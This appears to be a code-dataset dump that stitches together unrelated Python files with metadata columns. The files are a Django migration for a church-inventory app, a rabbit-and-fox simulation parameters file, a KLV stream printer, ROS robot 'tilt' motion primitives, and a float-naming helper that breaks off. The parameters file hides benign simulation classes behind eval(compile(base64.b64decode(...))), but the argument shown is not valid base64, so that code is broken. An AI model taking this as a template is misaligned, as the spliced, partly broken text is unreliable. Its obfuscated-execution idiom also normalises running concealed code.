] | null | null | null | biserici_inlemnite/biserici/migrations/0018_auto_20210731_0202.py | ck-tm/biserici-inlemnite | c9d12127b92f25d3ab2fcc7b4c386419fe308a4e | [
"MIT"
] | null | null | null | # Generated by Django 3.1.13 on 2021-07-30 23:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('nomenclatoare', '0005_boltapestealtar_historicalboltapestealtar_historicaltipboltapestealtar_historicaltipboltapronaos_tip'),
('biserici', '0017_auto_20210730_1652'),
]
operations = [
migrations.AlterModelOptions(
name='biserica',
options={'ordering': ['the_order'], 'verbose_name_plural': 'Biserici'},
),
migrations.AddField(
model_name='biserica',
name='the_order',
field=models.PositiveIntegerField(db_index=True, default=0, editable=False),
),
migrations.AddField(
model_name='historicalbiserica',
name='the_order',
field=models.PositiveIntegerField(db_index=True, default=0, editable=False),
),
migrations.AlterField(
model_name='componentaartistica',
name='iconostas_naos_altar_detalii',
field=models.TextField(blank=True, help_text='Particularități ale iconostasului ce merită a fi precizate (de urmărit care este standardul de iconostas în zonă și care sunt eventualele deviații de la standard', null=True, verbose_name='Detalii'),
),
migrations.AlterField(
model_name='componentaartistica',
name='iconostas_naos_altar_finisaj',
field=models.ManyToManyField(blank=True, related_name='iconostasuri_naos_altar', to='nomenclatoare.FinisajIconostas', verbose_name='Finisaj'),
),
migrations.AlterField(
model_name='componentaartistica',
name='iconostas_naos_altar_numar_intrari',
field=models.IntegerField(blank=True, null=True, verbose_name='Număr intrări'),
),
migrations.AlterField(
model_name='componentaartistica',
name='iconostas_naos_altar_tip',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='iconostasuri_naos_altar', to='nomenclatoare.tipiconostas', verbose_name='Tip'),
),
migrations.AlterField(
model_name='componentaartistica',
name='iconostas_pronaos_naos_detalii',
field=models.TextField(blank=True, help_text='Particularități ale iconostasului ce merită a fi precizate (de urmărit care este standardul de iconostas în zonă și care sunt eventualele deviații de la standard', null=True, verbose_name='Detalii'),
),
migrations.AlterField(
model_name='componentaartistica',
name='iconostas_pronaos_naos_finisaj',
field=models.ManyToManyField(blank=True, related_name='iconostasuri_pronaos_naos', to='nomenclatoare.FinisajIconostas', verbose_name='Finisaj'),
),
migrations.AlterField(
model_name='componentaartistica',
name='iconostas_pronaos_naos_numar_intrari',
field=models.IntegerField(blank=True, null=True, verbose_name='Număr intrări'),
),
migrations.AlterField(
model_name='componentaartistica',
name='iconostas_pronaos_naos_tip',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='iconostasuri_pronaos_naos', to='nomenclatoare.tipiconostas', verbose_name='Tip'),
),
migrations.AlterField(
model_name='historicalcomponentaartistica',
name='iconostas_naos_altar_detalii',
field=models.TextField(blank=True, help_text='Particularități ale iconostasului ce merită a fi precizate (de urmărit care este standardul de iconostas în zonă și care sunt eventualele deviații de la standard', null=True, verbose_name='Detalii'),
),
migrations.AlterField(
model_name='historicalcomponentaartistica',
name='iconostas_naos_altar_numar_intrari',
field=models.IntegerField(blank=True, null=True, verbose_name='Număr intrări'),
),
migrations.AlterField(
model_name='historicalcomponentaartistica',
name='iconostas_naos_altar_tip',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='nomenclatoare.tipiconostas', verbose_name='Tip'),
),
migrations.AlterField(
model_name='historicalcomponentaartistica',
name='iconostas_pronaos_naos_detalii',
field=models.TextField(blank=True, help_text='Particularități ale iconostasului ce merită a fi precizate (de urmărit care este standardul de iconostas în zonă și care sunt eventualele deviații de la standard', null=True, verbose_name='Detalii'),
),
migrations.AlterField(
model_name='historicalcomponentaartistica',
name='iconostas_pronaos_naos_numar_intrari',
field=models.IntegerField(blank=True, null=True, verbose_name='Număr intrări'),
),
migrations.AlterField(
model_name='historicalcomponentaartistica',
name='iconostas_pronaos_naos_tip',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='nomenclatoare.tipiconostas', verbose_name='Tip'),
),
]
| 54.76 | 257 | 0.686085 | 561 | 5,476 | 6.484848 | 0.188948 | 0.039582 | 0.096207 | 0.1116 | 0.876306 | 0.876306 | 0.876306 | 0.865311 | 0.865311 | 0.808411 | 0 | 0.008839 | 0.214938 | 5,476 | 99 | 258 | 55.313131 | 0.837404 | 0.0084 | 0 | 0.784946 | 1 | 0.043011 | 0.367907 | 0.179808 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021505 | 0 | 0.053763 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c1e1cdd28bc5e0fe318629a896a4db16ecaf0296 | 11,633 | py | Python | parameters.py | JonDamFlindt/DM562-Rabbits-and-Foxes | a80d3d936b0c7d377db649f83495c24e700446d6 | [
"MIT"
] | null | null | null | parameters.py | JonDamFlindt/DM562-Rabbits-and-Foxes | a80d3d936b0c7d377db649f83495c24e700446d6 | [
"MIT"
] | null | null | null | parameters.py | JonDamFlindt/DM562-Rabbits-and-Foxes | a80d3d936b0c7d377db649f83495c24e700446d6 | [
"MIT"
] | null | null | null | import base64
eval(compile(base64.b64decode(b'class Simulation:
  """
  Describes the simulation setup (the world, the populations of rabbits and
  foxes, and its execution). Instance variables (world, rabbits, foxes, and
  execution) are initialised with an instance of the appropriate class (World,
  Population, or Execution) containing default values for all parameters.
  """

  __slots__ = [
    '_world',
    '_rabbits',
    '_foxes',
    '_execution'
    ]

  def __init__(self):
    self._world = World()
    self._rabbits = Population(
      'rabbits',
      100, # initial_size
      3,   # metabolism
      25,  # max_age
      45,  # max_energy
      .5,  # reproduction_rate
      5,   # reproduction_cost
      10,  # reproduction_age
      )
    self._foxes = Population(
      'foxes',
      30,  # initial_size
      2,   # metabolism
      50,  # max_age
      200, # max_energy
      .5,  # reproduction_rate
      120, # reproduction_cost
      10,  # reproduction_age
      )
    self._execution = Execution()

  @property
  def world(self):
    """
    Parameters for the simulated world. See class World.
    """
    return self._world

  @property
  def rabbits(self):
    """
    Parameters for the rabbit population. See class Population.
    """
    return self._rabbits

  @property
  def foxes(self):
    """
    Parameters for the fox population. See class Population.
    """
    return self._foxes

  @property
  def execution(self):
    """
    Parameters for the simulation execution. See class Execution.
    """
    return self._execution

  def __str__(self) -> str:
    return f"world: {self.world}\n{self.rabbits}\n{self.foxes}\nexecution: {self.execution}"

    
class World:
  """
  Describes the simulated 2D world in its shape (toroid or island) and size.

  See __init__ for defaults.
  """
  
  __slots__ = [
      'is_toroid',
      '_north_south_length',
      '_west_east_length'
      ]

  def __init__(self,
               north_south_length = 20,
               west_east_length = 20,
               is_toroid = True):
    self.is_toroid = is_toroid
    self.north_south_length = north_south_length
    self.west_east_length = west_east_length

  def shape(self) -> str:
    """
    Returns the name of the shape of the world ('toroid' or 'island').
    """
    return 'toroid' if self.is_toroid else 'island'
    
  @property
  def north_south_length(self) -> int:
    """
    The north-south length of the simulated world.
    
    Precondition: integer and non-negative.
    """
    return self._north_south_length

  @north_south_length.setter
  def north_south_length(self,length : int):
    self._north_south_length = length

  @property
  def west_east_length(self) -> int:
    """
    The west-east length of the simulated world.
    
    Precondition: integer and non-negative.
    """
    return self._west_east_length

  @west_east_length.setter
  def west_east_length(self,length : int):
    self._west_east_length = length

  def area(self) -> int:
    """
    Returns the total area of the world.
    """
    return self.north_south_length * self.west_east_length

  def __repr__(self):
    return f"World({self.north_south_length},{self.west_east_length},{self.is_toroid})"

  def __str__(self):
    return f"{self.shape()} {self.north_south_length} by {self.west_east_length}"
    
class Population:
  """
  Describes a population in the simulation (e.g., rabbits).
  """
 
  __slots__ = [
    '_species',
    '_max_age',
    '_metabolism',
    '_max_energy',
    '_initial_size',
    '_reproduction_probability',
    '_reproduction_min_energy',
    '_reproduction_min_age'
    ]

  def __init__(self,
               species,
               initial_size,
               metabolism,
               max_age,
               max_energy,
               reproduction_probability,
               reproduction_min_energy,
               reproduction_min_age):
    """
    Arguments: see the corresponding properties and data descriptors.
    """
    self._species = species
    self.initial_size = initial_size
    self.metabolism = metabolism
    self.max_age = max_age
    self.max_energy = max_energy
    self.reproduction_probability = reproduction_probability
    self.reproduction_min_energy = reproduction_min_energy
    self.reproduction_min_age = reproduction_min_age

  @property
  def species(self) -> str:
    """
    The population species (e.g.,'rabbits').
    """
    return self._species

  @property
  def initial_size(self) -> int:
    """
    The initial size of the populatio.
    
    Precondition: integer between 0 and the avaluable surface area.
    """
    return self._initial_size

  @initial_size.setter
  def initial_size(self,value):
    self._initial_size = value

  @property
  def metabolism(self) -> int:
    """
    The amount of energy consumed during each step of the simulation.

    Precondition: non-negative.
    """
    return self._metabolism

  @metabolism.setter
  def metabolism(self,value):
    self._metabolism = value

  @property
  def max_age(self) -> int:
    """
    The maximum age (in simulation steps) a member of this species can have.
    
    Precondition: integer and positive.
    """
    return self._max_age

  @max_age.setter
  def max_age(self,value):
    self._max_age = value

  @property
  def max_energy(self) -> int:
    """
    The maximum energy level a member of this species can have.

    Precondition: positive.
    """
    return self._max_energy

  @max_energy.setter
  def max_energy(self,value : int):
    self._max_energy = value

  @property
  def reproduction_probability(self) -> float:
    """
    The probability of reproduction when all conditions on age, energy, and environment are met.
    
    Precondition: a floating point value representing a probability.
    """
    return self._reproduction_probability

  @reproduction_probability.setter
  def reproduction_probability(self,value):
    self._reproduction_probability = value

  
  @property
  def reproduction_min_age(self) -> int:
    """
    The minimum age an individual must have in order to reproduce.
    """
    return self._reproduction_min_age

  @reproduction_min_age.setter
  def reproduction_min_age(self,value):
    self._reproduction_min_age = value

  
  @property
  def reproduction_min_energy(self) -> int:
    """
    The minimum energy level an individual must have in order to reproduce.
    """
    return self._reproduction_min_energy

  @reproduction_min_energy.setter
  def reproduction_min_energy(self,value):
    self._reproduction_min_energy = value

  def __repr__(self) -> str:
    return "Population('{}', {}, {}, {}, {}, {}, {}, {})".format(
      self.species,
      self.initial_size,
      self.metabolism,
      self.max_age,
      self.max_energy,
      self.reproduction_probability,
      self.reproduction_min_energy,
      self.reproduction_min_age)

  def __str__(self) -> str:
    return f"""{self.species}: {self.initial_size}
  metabolism:    {self.metabolism}
  max_age:       {self.max_age}
  max_energy:    {self.max_energy}
  reproduction:
    probability: {self.reproduction_probability}
    cost:        {self.reproduction_min_energy}
    age:         {self.reproduction_min_age}"""

class Execution:
  """
  Contains parameters for the simulation execution.

  See __init__ for defaults.
  """
  
  __slots__ = [
      '_max_steps',
      '_step_delay',
      '_batch'
      ]

  def __init__(self,
               max_steps = 1000,
               step_delay = 0.1,
               batch = True):
    self.max_steps = max_steps
    self.step_delay = step_delay
    self.batch = batch

  @property
  def max_steps(self) -> int:
    """
    The maximum number of steps the simulation can run for.
    """
    return self._max_steps

  @max_steps.setter
  def max_steps(self,value):
    self._max_steps = value


  @property
  def step_delay(self) -> float:
    """
    A delay (in seconds) added to each step of the simulation.
    """
    return self._step_delay

  @step_delay.setter
  def step_delay(self,value):
    self._step_delay = value


  @property
  def batch(self) -> bool:
    """
    Whether the simulation executed in batch mode (no visualization) or visualising its status.
    """
    return self._batch

  @batch.setter
  def batch(self,value):
    self._batch = value

  def mode(self) -> str:
    """
    Returns the mode of execution (batch or visual) as a string.
    """
    return 'batch' if self.batch else 'visual'

  def __repr__(self) -> str:
    return f"Execution({self.max_steps},{self.step_delay},{self.batch})"

  def __str__(self) -> str:
    return f"{self.mode()} mode, {self.max_steps} steps with a delay {self.step_delay}s"
'),'<string>','exec'))
| 3,877.666667 | 11,618 | 0.997335 | 19 | 11,633 | 610.631579 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107137 | 0.000258 | 11,633 | 2 | 11,619 | 5,816.5 | 0.890456 | 0 | 0 | 0 | 0 | 0 | 0.9951 | 0.994069 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
c1ec5fbd2e336c0d5d939aa3abca8504afb0237a | 254 | py | Python | examples/pprint_stdin.py | stharding/klvdata | e34529c4eba7c8cd00fe56834b623d8e5770f47a | [
"MIT"
] | 6 | 2016-10-21T00:49:27.000Z | 2017-08-31T04:36:38.000Z | examples/pprint_stdin.py | stharding/klvdata | e34529c4eba7c8cd00fe56834b623d8e5770f47a | [
"MIT"
] | null | null | null | examples/pprint_stdin.py | stharding/klvdata | e34529c4eba7c8cd00fe56834b623d8e5770f47a | [
"MIT"
] | 2 | 2017-05-26T10:44:34.000Z | 2017-06-23T22:05:55.000Z | #!/usr/bin/env python3
import sys, klvdata;
for packet in klvdata.StreamParser(sys.stdin.buffer.read()): packet.structure()
# python -c "import sys; import klvdata; for packet in klvdata.StreamParser(sys.stdin.buffer.read()): packet.structure()"
| 36.285714 | 122 | 0.73622 | 35 | 254 | 5.342857 | 0.485714 | 0.096257 | 0.171123 | 0.192513 | 0.748663 | 0.748663 | 0.748663 | 0.748663 | 0.748663 | 0.748663 | 0 | 0.004464 | 0.11811 | 254 | 6 | 123 | 42.333333 | 0.830357 | 0.555118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
c1f2c6aac16f1e6f314d67673e2262896c176d04 | 10,865 | py | Python | script/tilt.py | HKUST-RML/Shallow_Depth_Insertion | c2559479285d69a514e81467c5582f6384fc5dc1 | [
"MIT"
] | 3 | 2021-08-19T12:41:16.000Z | 2021-09-09T09:51:50.000Z | script/tilt.py | HKUST-RML/Shallow_Depth_Insertion | c2559479285d69a514e81467c5582f6384fc5dc1 | [
"MIT"
] | null | null | null | script/tilt.py | HKUST-RML/Shallow_Depth_Insertion | c2559479285d69a514e81467c5582f6384fc5dc1 | [
"MIT"
] | 1 | 2022-01-13T08:24:18.000Z | 2022-01-13T08:24:18.000Z | #!/usr/bin/env python
import sys
import math
import rospy
import copy
import numpy as np
import tf
import moveit_commander
import helper
import motion_primitives
moveit_commander.roscpp_initialize(sys.argv) #initialize the moveit commander
robot = moveit_commander.RobotCommander() #define the robot
scene = moveit_commander.PlanningSceneInterface() #define the scene
group = moveit_commander.MoveGroupCommander("manipulator") #define the planning group (from the moveit packet 'manipulator' planning group)
def tilt(point, axis, angle, velocity):
'''Tilt primitive motion of robot.
Parameters:
point (list): 3-D coordinate of point in rotation axis
axis (list): 3-D vector of rotation axis (right-hand rule)
angle (double): angle of tilting
velocity (double): robot velocity between 0 and 1
Returns:
'''
# Normalize axis vector
axis = axis/np.linalg.norm(axis)
# Pose variables. The parameters can be seen from "$ rosmsg show Pose"
pose_target = group.get_current_pose().pose
pos_initial = [pose_target.position.x, pose_target.position.y, pose_target.position.z]
ori_initial = [pose_target.orientation.x, pose_target.orientation.y, pose_target.orientation.z, pose_target.orientation.w]
# Tilt center point. Closest point from tcp to axis line
center = np.add(point, np.dot(np.subtract(pos_initial, point), axis)*axis)
# Closest distance from tcp to axis line
radius = np.linalg.norm(np.subtract(center, pos_initial))
# Pair of orthogonal vectors in tilt plane
v1 = -np.subtract(np.add(center, np.dot(np.subtract(pos_initial, center), axis)*axis), pos_initial)
v1 = v1/np.linalg.norm(v1)
v2 = np.cross(axis, v1)
# Interpolate orientation poses via quaternion slerp
q = helper.axis_angle2quaternion(axis, angle)
ori_target = tf.transformations.quaternion_multiply(q, ori_initial)
ori_waypoints = helper.slerp(ori_initial, ori_target, np.arange(1.0/angle , 1.0+1.0/angle, 1.0/angle))
waypoints = []
for t in range(1, angle+1):
circle = np.add(center, radius*(math.cos(math.radians(t)))*v1 + radius*(math.sin(math.radians(t)))*v2)
pose_target.position.x = circle[0]
pose_target.position.y = circle[1]
pose_target.position.z = circle[2]
pose_target.orientation.x = ori_waypoints[t-1][0]
pose_target.orientation.y = ori_waypoints[t-1][1]
pose_target.orientation.z = ori_waypoints[t-1][2]
pose_target.orientation.w = ori_waypoints[t-1][3]
waypoints.append(copy.deepcopy(pose_target))
(plan, fraction) = group.compute_cartesian_path(waypoints, 0.01, 0) # waypoints, resolution=1cm, jump_threshold)
retimed_plan = group.retime_trajectory(robot.get_current_state(), plan, velocity) # Retime trajectory with scaled velocity
group.execute(retimed_plan)
def active_tilt(point, axis, angle, velocity, active_distance=0.125):
'''Tilt primitive motion of robot.
Parameters:
point (list): 3-D coordinate of point in rotation axis
axis (list): 3-D vector of rotation axis (right-hand rule)
angle (double): angle of tilting
velocity (double): robot velocity between 0 and 1
Returns:
'''
# Normalize axis vector
axis = axis/np.linalg.norm(axis)
# Pose variables. The parameters can be seen from "$ rosmsg show Pose"
pose_target = group.get_current_pose().pose
pos_initial = [pose_target.position.x, pose_target.position.y, pose_target.position.z]
ori_initial = [pose_target.orientation.x, pose_target.orientation.y, pose_target.orientation.z, pose_target.orientation.w]
# Tilt center point. Closest point from tcp to axis line
center = np.add(point, np.dot(np.subtract(pos_initial, point), axis)*axis)
# Closest distance from tcp to axis line
radius = np.linalg.norm(np.subtract(center, pos_initial))
# Pair of orthogonal vectors in tilt plane
v1 = -np.subtract(np.add(center, np.dot(np.subtract(pos_initial, center), axis)*axis), pos_initial)
v1 = v1/np.linalg.norm(v1)
v2 = np.cross(axis, v1)
# Interpolate orientation poses via quaternion slerp
q = helper.axis_angle2quaternion(axis, angle)
ori_target = tf.transformations.quaternion_multiply(q, ori_initial)
ori_waypoints = helper.slerp(ori_initial, ori_target, np.arange(1.0/angle , 1.0+1.0/angle, 1.0/angle))
waypoints = []
for t in range(1, angle+1):
circle = np.add(center, radius*(math.cos(math.radians(t)))*v1 + radius*(math.sin(math.radians(t)))*v2)
pose_target.position.x = circle[0]
pose_target.position.y = circle[1] + active_distance*t/(angle+1)
pose_target.position.z = circle[2]
pose_target.orientation.x = ori_waypoints[t-1][0]
pose_target.orientation.y = ori_waypoints[t-1][1]
pose_target.orientation.z = ori_waypoints[t-1][2]
pose_target.orientation.w = ori_waypoints[t-1][3]
waypoints.append(copy.deepcopy(pose_target))
(plan, fraction) = group.compute_cartesian_path(waypoints, 0.01, 0) # waypoints, resolution=1cm, jump_threshold)
retimed_plan = group.retime_trajectory(robot.get_current_state(), plan, velocity) # Retime trajectory with scaled velocity
group.execute(retimed_plan)
def tilt_no_wait(point, axis, angle, velocity):
'''Tilt primitive motion of robot.
Parameters:
point (list): 3-D coordinate of point in rotation axis
axis (list): 3-D vector of rotation axis (right-hand rule)
angle (double): angle of tilting
velocity (double): robot velocity between 0 and 1
Returns:
'''
# Normalize axis vector
axis = axis/np.linalg.norm(axis)
# Pose variables. The parameters can be seen from "$ rosmsg show Pose"
pose_target = group.get_current_pose().pose
pos_initial = [pose_target.position.x, pose_target.position.y, pose_target.position.z]
ori_initial = [pose_target.orientation.x, pose_target.orientation.y, pose_target.orientation.z, pose_target.orientation.w]
# Tilt center point. Closest point from tcp to axis line
center = np.add(point, np.dot(np.subtract(pos_initial, point), axis)*axis)
# Closest distance from tcp to axis line
radius = np.linalg.norm(np.subtract(center, pos_initial))
# Pair of orthogonal vectors in tilt plane
v1 = -np.subtract(np.add(center, np.dot(np.subtract(pos_initial, center), axis)*axis), pos_initial)
v1 = v1/np.linalg.norm(v1)
v2 = np.cross(axis, v1)
# Interpolate orientation poses via quaternion slerp
q = helper.axis_angle2quaternion(axis, angle)
ori_target = tf.transformations.quaternion_multiply(q, ori_initial)
ori_waypoints = helper.slerp(ori_initial, ori_target, np.arange(1.0/angle , 1.0+1.0/angle, 1.0/angle))
waypoints = []
for t in range(1, angle+1):
circle = np.add(center, radius*(math.cos(math.radians(t)))*v1 + radius*(math.sin(math.radians(t)))*v2)
pose_target.position.x = circle[0]
pose_target.position.y = circle[1] - (0.005 *(float(t)/float(angle+1)))
pose_target.position.z = circle[2] - (0.005 *(float(t)/float(angle+1)))
#print circle[2] - (0.01 *(float(t)/float(angle+1)))
pose_target.orientation.x = ori_waypoints[t-1][0]
pose_target.orientation.y = ori_waypoints[t-1][1]
pose_target.orientation.z = ori_waypoints[t-1][2]
pose_target.orientation.w = ori_waypoints[t-1][3]
waypoints.append(copy.deepcopy(pose_target))
(plan, fraction) = group.compute_cartesian_path(waypoints, 0.01, 0) # waypoints, resolution=1cm, jump_threshold)
retimed_plan = group.retime_trajectory(robot.get_current_state(), plan, velocity) # Retime trajectory with scaled velocity
group.execute(retimed_plan, wait=False)
return waypoints
def translate_tilt(point, axis, angle, velocity, translate_distance):
'''Tilt primitive motion of robot.
Parameters:
point (list): 3-D coordinate of point in rotation axis
axis (list): 3-D vector of rotation axis (right-hand rule)
angle (double): angle of tilting
velocity (double): robot velocity between 0 and 1
push_distance (double): distance to translate while tilting
Returns:
'''
# Normalize axis vector
axis = axis/np.linalg.norm(axis)
# Pose variables. The parameters can be seen from "$ rosmsg show Pose"
pose_target = group.get_current_pose().pose
pos_initial = [pose_target.position.x, pose_target.position.y, pose_target.position.z]
ori_initial = [pose_target.orientation.x, pose_target.orientation.y, pose_target.orientation.z, pose_target.orientation.w]
# Tilt center point. Closest point from tcp to axis line
center = np.add(point, np.dot(np.subtract(pos_initial, point), axis)*axis)
# Closest distance from tcp to axis line
radius = np.linalg.norm(np.subtract(center, pos_initial))
# Pair of orthogonal vectors in tilt plane
v1 = -np.subtract(np.add(center, np.dot(np.subtract(pos_initial, center), axis)*axis), pos_initial)
v1 = v1/np.linalg.norm(v1)
v2 = np.cross(axis, v1)
# Interpolate orientation poses via quaternion slerp
q = helper.axis_angle2quaternion(axis, angle)
ori_target = tf.transformations.quaternion_multiply(q, ori_initial)
ori_waypoints = helper.slerp(ori_initial, ori_target, np.arange(1.0/angle , 1.0+1.0/angle, 1.0/angle))
waypoints = []
for t in range(1, angle+1):
circle = np.add(center, radius*(math.cos(math.radians(t)))*v1 + radius*(math.sin(math.radians(t)))*v2)
pose_target.position.x = circle[0]
pose_target.position.y = circle[1]#+(t/angle)*translate_distance
pose_target.position.z = circle[2]-(t/angle)*translate_distance
pose_target.orientation.x = ori_waypoints[t-1][0]
pose_target.orientation.y = ori_waypoints[t-1][1]
pose_target.orientation.z = ori_waypoints[t-1][2]
pose_target.orientation.w = ori_waypoints[t-1][3]
waypoints.append(copy.deepcopy(pose_target))
(plan, fraction) = group.compute_cartesian_path(waypoints, 0.01, 0) # waypoints, resolution=1cm, jump_threshold)
retimed_plan = group.retime_trajectory(robot.get_current_state(), plan, velocity) # Retime trajectory with scaled velocity
group.execute(retimed_plan)
if __name__ == '__main__':
try:
rospy.init_node('tilt', anonymous=True) #initialize the node
group.set_max_velocity_scaling_factor(1.0)
motion_primitives.set_joint([0, -90, 90, 90, 90, 0])
p = group.get_current_pose().pose
tilt([p.position.x,p.position.y,p.position.z], [0,-1,0], 90, 0.5)
except rospy.ROSInterruptException: pass
| 47.034632 | 139 | 0.693787 | 1,554 | 10,865 | 4.718147 | 0.107465 | 0.087289 | 0.091653 | 0.030551 | 0.89198 | 0.881206 | 0.871386 | 0.864157 | 0.859111 | 0.859111 | 0 | 0.022154 | 0.189876 | 10,865 | 230 | 140 | 47.23913 | 0.810838 | 0.262586 | 0 | 0.761538 | 0 | 0 | 0.002945 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030769 | false | 0.007692 | 0.069231 | 0 | 0.107692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a9b94d99a2a5e59d02f2a2fa3d3a6111ada5acfb | 84 | py | Python | vit_retri/engine/__init__.py | ludics/ViT-Retri | 4a17ae8392a0f8145a2f5ee37854e76503c26009 | [
"MIT"
] | 1 | 2021-05-07T02:58:21.000Z | 2021-05-07T02:58:21.000Z | vit_retri/engine/__init__.py | ludics/ViT-Retri | 4a17ae8392a0f8145a2f5ee37854e76503c26009 | [
"MIT"
] | null | null | null | vit_retri/engine/__init__.py | ludics/ViT-Retri | 4a17ae8392a0f8145a2f5ee37854e76503c26009 | [
"MIT"
] | null | null | null | from .trainer import train
from .trainer import setup
from .trainer import set_seed
| 21 | 29 | 0.821429 | 13 | 84 | 5.230769 | 0.538462 | 0.485294 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 84 | 3 | 30 | 28 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a9cfd6df68b45c104f49d4d52c7dacf35255182b | 83 | py | Python | sputr/__init__.py | polishmatt/sputr | 7611d40090c8115dff69912725efc506414ac47a | [
"MIT"
] | 1 | 2017-02-13T23:09:18.000Z | 2017-02-13T23:09:18.000Z | sputr/__init__.py | polishmatt/sputr | 7611d40090c8115dff69912725efc506414ac47a | [
"MIT"
] | 6 | 2017-02-18T20:14:32.000Z | 2017-09-27T19:07:06.000Z | sputr/__init__.py | polishmatt/sputr | 7611d40090c8115dff69912725efc506414ac47a | [
"MIT"
] | null | null | null |
from .sputr import discover
from .sputr import list_tests
from .sputr import run
| 13.833333 | 29 | 0.795181 | 13 | 83 | 5 | 0.538462 | 0.415385 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168675 | 83 | 5 | 30 | 16.6 | 0.942029 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a9ef7f582f1b35183130150ba097a7daa2442da6 | 4,676 | py | Python | geometry/names.py | nlitsme/GeometricShapes | 07c2ef598dedbbf0aef9282e58edfd2f72307b29 | [
"MIT"
] | 2 | 2017-12-29T06:44:19.000Z | 2021-07-19T18:03:01.000Z | geometry/names.py | nlitsme/GeometricShapes | 07c2ef598dedbbf0aef9282e58edfd2f72307b29 | [
"MIT"
] | null | null | null | geometry/names.py | nlitsme/GeometricShapes | 07c2ef598dedbbf0aef9282e58edfd2f72307b29 | [
"MIT"
] | null | null | null | """
Module for finding an expression given a float
Note that this is of course just guessing.
"""
import math
def namednumber(num):
""" attempt to find exact constant for float """
def isnear(val):
return abs(num-val)<0.00001
if isnear(0.0): return "0"
if num<0:
sign = "-"
num = -num
else:
sign = ""
if isnear(1.0): return sign+"1"
if isnear(math.pi): return sign+"pi"
if isnear((math.sqrt(6)+math.sqrt(2))/4): return sign+"(sqrt(6)+sqrt(2))/4"
if isnear((math.sqrt(6)-math.sqrt(2))/4): return sign+"(sqrt(6)-sqrt(2))/4"
if isnear((math.sqrt(5)+1.0)/2): return sign+"(sqrt(5)+1)/2"
if isnear((math.sqrt(5)-1.0)/2): return sign+"(sqrt(5)-1)/2"
if isnear(math.sqrt((math.sqrt(5)+5.0)/2)): return sign+"sqrt((sqrt(5)+5)/2)"
if isnear(math.atan((math.sqrt(5)+1.0)/2)): return sign+"atan((sqrt(5)+1)/2)"
if isnear(math.atan((math.sqrt(5)-1.0)/2)): return sign+"atan((sqrt(5)-1)/2)"
if isnear(math.pi-math.atan((math.sqrt(5)+1.0)/2)): return sign+"(pi-atan((sqrt(5)+1)/2))"
if isnear(math.pi-math.atan((math.sqrt(5)-1.0)/2)): return sign+"(pi-atan((sqrt(5)-1)/2))"
for div in range(2,20):
if isnear(div): return sign+"%d" % div
if isnear(1.0/div): return sign+"1/%d" % div
if isnear(math.sqrt(div)): return sign+"sqrt(%d)" % div
if isnear(1.0/math.sqrt(div)): return sign+"1/sqrt(%d)" % div
if isnear(math.pi/div): return sign+"pi/%d" % div
if isnear(math.atan(div)): return sign+"atan(%d)" % div
if isnear(math.pi-math.atan(div)): return sign+"(pi-atan(%d))" % div
if isnear(math.atan(1.0/div)): return sign+"atan(1/%d)" % div
if isnear(math.pi-math.atan(1.0/div)): return sign+"(pi-atan(1/%d))" % div
if isnear(math.atan(1.0/div)/2): return sign+"atan(1/%d)/2" % div
